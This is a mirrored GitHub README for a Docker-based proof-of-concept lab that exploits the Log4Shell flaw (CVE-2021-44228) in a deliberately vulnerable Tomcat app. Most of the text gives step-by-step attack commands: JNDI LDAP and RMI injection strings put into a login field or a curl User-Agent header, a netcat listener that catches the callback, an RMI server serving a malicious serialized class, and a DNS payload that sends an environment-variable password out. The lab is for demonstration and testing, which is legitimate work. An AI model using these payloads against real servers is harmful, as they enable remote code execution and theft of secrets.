GithubHelp home page GithubHelp logo

weinrich15 / log4poc Goto Github PK

View Code? Open in Web Editor NEW

This project forked from cyberxml/log4j-poc

0.0 0.0 0.0 41.85 MB

A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell

Shell 7.52% Python 38.24% Java 44.82% Dockerfile 9.42%

log4poc's Introduction

log4j-poc

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Description

The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks.

The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc

This demo tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigued to use Log4J2 for logging - a non-standard configuration.

A newer Bitnami server is now available on port 8888. It is also is configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.

The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin

The detection script will check for user-agent vulnerablities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Prerequisites

This code requires Docker and Docker Compose

Installation

git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build

Run Web App Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. Navigate to the web app on port 8080
    1. Navigate to http://10.10.10.31:8080/log4shell
      1. Enter the username: admin
      2. Enter the password: password
      3. Select the "login" button
      4. See the welcome screen
    2. Return to login at http://10.10.10.31:8080/log4shell
      1. Enter the username ${jndi:ldap://172.16.238.11:1389/a}
      2. Select the "login" button
      3. Check for connection on your nc listener

Run a User Agent Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. In a third terminal, run the following. The second IP is the docker host
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Run a DNS Exfil Demo on Recent Java 11 version

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. The vulnerable web server will attempt to do a TXT lookup at the given IP. See log4j-dns_exfil.pcap

Run an RMI RCE Demo on Recent Java 11 version

I am having issues with command line arg for ping target. So you have to compile yourself.

Compile

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In another terminal, Login to the cve-poc
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Kill running RMIServerPOC instance
  4. Change to rmi-poc directory
    1. cd /home/user/rmi-poc
  5. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
  6. Recompile
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. Run the Server
    1. javac -cp catalina.jar:. RMIServerPOC 127.0.0.1

Run RMI RCE Demo

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. The vulnerable web server will download a serialized malicious class from the RMI server for a class which already exists in the Tomcat environment.
  4. This will ping the IP address defined in the compile section.

Detect UA Vulnerability

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. you will have to kill the process, not sure yet why this hangs

log4poc's People

Contributors

cyberxml avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.